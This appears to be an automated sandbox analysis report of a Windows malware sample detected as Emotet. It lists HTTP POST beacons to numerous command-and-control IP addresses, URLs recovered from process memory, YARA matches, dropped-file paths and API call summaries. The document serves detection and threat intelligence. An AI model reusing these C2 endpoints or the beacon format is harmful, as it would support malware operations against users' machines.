Source: global traffic	HTTP traffic detected: POST /E3hL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 134.209.36.254/E3hL/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------OOSFyEasHost: 134.209.36.254:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 104.156.59.7/FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------MSEffD6JzUJfZBtHost: 104.156.59.7:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 120.138.30.150/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------bZkOzxK4zn4b0KTHost: 120.138.30.150:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /XG8n3jTZrFy/lHI9yRZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 194.187.133.160/XG8n3jTZrFy/lHI9yRZ/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------zXleQFeYywUClB9Host: 194.187.133.160:443Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 104.236.246.93/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------NBBLq11r7nGYVqjmxbNHUHost: 104.236.246.93:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.208.45.104/ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------Do3Ke7g8xifpHost: 74.208.45.104:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5S5kEp7rlV/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 78.187.156.31/5S5kEp7rlV/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------lCyDxrkplc0as1Host: 78.187.156.31Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /ImKmz54ud/lOnNJXoawXKn45K/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 187.161.206.24/ImKmz54ud/lOnNJXoawXKn45K/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------1vnYjInPs0nROHost: 187.161.206.24Content-Length: 4596Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /7hdPY7r49/4nVUijhIy/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.216.33/7hdPY7r49/4nVUijhIy/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------WBkExGP7QZeTHost: 94.23.216.33Content-Length: 4596Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /m19rVa/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 172.91.208.86/m19rVa/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------R15P0sdM7tHost: 172.91.208.86Content-Length: 4596Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.211.88.52/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------TgOn9JqIY7Z0lZ2GBbROfBVHost: 91.211.88.52:7080Content-Length: 4612Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 74.219.172.26
Source: unknown	TCP traffic detected without corresponding DNS query: 74.219.172.26
Source: unknown	TCP traffic detected without corresponding DNS query: 74.219.172.26
Source: unknown	TCP traffic detected without corresponding DNS query: 74.219.172.26
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 134.209.36.254
Source: unknown	TCP traffic detected without corresponding DNS query: 104.156.59.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.156.59.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.156.59.7
Source: unknown	TCP traffic detected without corresponding DNS query: 104.156.59.7
Source: unknown	TCP traffic detected without corresponding DNS query: 120.138.30.150
Source: unknown	TCP traffic detected without corresponding DNS query: 120.138.30.150
Source: unknown	TCP traffic detected without corresponding DNS query: 120.138.30.150
Source: unknown	TCP traffic detected without corresponding DNS query: 120.138.30.150
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 194.187.133.160
Source: unknown	TCP traffic detected without corresponding DNS query: 104.236.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 104.236.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 104.236.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 104.236.246.93
Source: unknown	TCP traffic detected without corresponding DNS query: 74.208.45.104
Source: unknown	TCP traffic detected without corresponding DNS query: 74.208.45.104
Source: unknown	TCP traffic detected without corresponding DNS query: 74.208.45.104
Source: unknown	TCP traffic detected without corresponding DNS query: 74.208.45.104
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 78.187.156.31
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 187.161.206.24
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 94.23.216.33
Source: unknown	TCP traffic detected without corresponding DNS query: 172.91.208.86
Source: unknown	TCP traffic detected without corresponding DNS query: 172.91.208.86

Source: unknown

HTTP traffic detected: POST /8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------nSkemeWNWaOePnS4Host: 74.219.172.26Content-Length: 4644Cache-Control: no-cache

Source: provthrd.exe, 00000002.00000002.2728004191.00000000006C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.156.59.7:8080/FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/
Source: provthrd.exe, 00000002.00000002.2728004191.000000000068E000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/
Source: provthrd.exe, 00000002.00000002.2728004191.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/J
Source: provthrd.exe, 00000002.00000003.2331995247.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/TZrFy/lHI9yRZ/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/l
Source: provthrd.exe, 00000002.00000002.2728004191.00000000006C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/
Source: provthrd.exe, 00000002.00000002.2728004191.00000000006C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/a
Source: provthrd.exe, 00000002.00000003.1711037124.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1744625653.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1771183581.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://134.209.36.254:8080/E3hL/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.91.208.86/m19rVa/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.91.208.86/m19rVa/%
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.91.208.86/m19rVa//4nVUijhIy/e
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.91.208.86/m19rVa/G
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.91.208.86/m19rVa/J
Source: provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/
Source: provthrd.exe, 00000002.00000003.2331995247.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/k
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.208.45.104:8080/ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://78.187.156.31/5S5kEp7rlV/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://78.187.156.31/5S5kEp7rlV/JU/R
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://78.187.156.31/5S5kEp7rlV/l
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://78.187.156.31/5S5kEp7rlV/stem32
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728829722.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/c)
Source: provthrd.exe, 00000002.00000002.2728829722.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/oOb
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.23.216.33/7hdPY7r49/4nVUijhIy/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.23.216.33/7hdPY7r49/4nVUijhIy//
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.23.216.33/7hdPY7r49/4nVUijhIy/I9yRZ/
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.23.216.33/7hdPY7r49/4nVUijhIy/i

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0040BDF0 GetPropA,GetClientRect,CreateCompatibleDC,CreateCompatibleBitmap,SendMessageA,SendMessageA,BitBlt,GetMessagePos,GetDCEx,GetWindowDC,ReleaseDC,CallWindowProcA,

0_2_0040BDF0

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00434637 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00434637
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004446A5 GetKeyState,GetKeyState,GetKeyState,	0_2_004446A5
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0043294D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_0043294D
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004409EE ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	0_2_004409EE
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00447A61 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	0_2_00447A61
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00447A76 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	0_2_00447A76
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0042DD8A __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	0_2_0042DD8A
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00434637 GetKeyState,GetKeyState,GetKeyState,GetKeyState,	2_2_00434637
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004446A5 GetKeyState,GetKeyState,GetKeyState,	2_2_004446A5
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0043294D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	2_2_0043294D
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004409EE ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	2_2_004409EE
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00447A61 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	2_2_00447A61
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00447A76 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	2_2_00447A76
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0042DD8A __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	2_2_0042DD8A

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0.2.ExeFile (360).exe.54279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.690000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c279e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.900000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c279e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c052e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\dllhost\provthrd.exe

Code function: 2_2_009025A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,

2_2_009025A0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ExeFile (360).exe.54279e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 0.2.ExeFile (360).exe.690000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 2.2.provthrd.exe.8c279e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 0.2.ExeFile (360).exe.54279e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 0.2.ExeFile (360).exe.54052e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 2.2.provthrd.exe.900000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 2.2.provthrd.exe.8c279e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 2.2.provthrd.exe.8c052e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 2.2.provthrd.exe.8c052e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 0.2.ExeFile (360).exe.54052e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
Source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown

Source: C:\Users\user\Desktop\ExeFile (360).exe

File created: C:\Windows\SysWOW64\dllhost\

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

File deleted: C:\Windows\SysWOW64\dllhost\provthrd.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004036D0	0_2_004036D0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_004240CA	0_2_004240CA
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0041EF14	0_2_0041EF14
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0042B5D0	0_2_0042B5D0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0043170E	0_2_0043170E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_006980D0	0_2_006980D0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00697D60	0_2_00697D60
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_006963F0	0_2_006963F0
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00697530	0_2_00697530
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00691C70	0_2_00691C70
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005490CE	0_2_005490CE
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054380E	0_2_0054380E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005498FE	0_2_005498FE
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00549C6E	0_2_00549C6E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00547F8E	0_2_00547F8E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004036D0	2_2_004036D0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_004240CA	2_2_004240CA
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0041EF14	2_2_0041EF14
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0042B5D0	2_2_0042B5D0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_0043170E	2_2_0043170E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_009080D0	2_2_009080D0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_009063F0	2_2_009063F0
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00907530	2_2_00907530
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00901C70	2_2_00901C70
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00907D60	2_2_00907D60
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C90CE	2_2_008C90CE
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C98FE	2_2_008C98FE
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C380E	2_2_008C380E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C9C6E	2_2_008C9C6E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C7F8E	2_2_008C7F8E

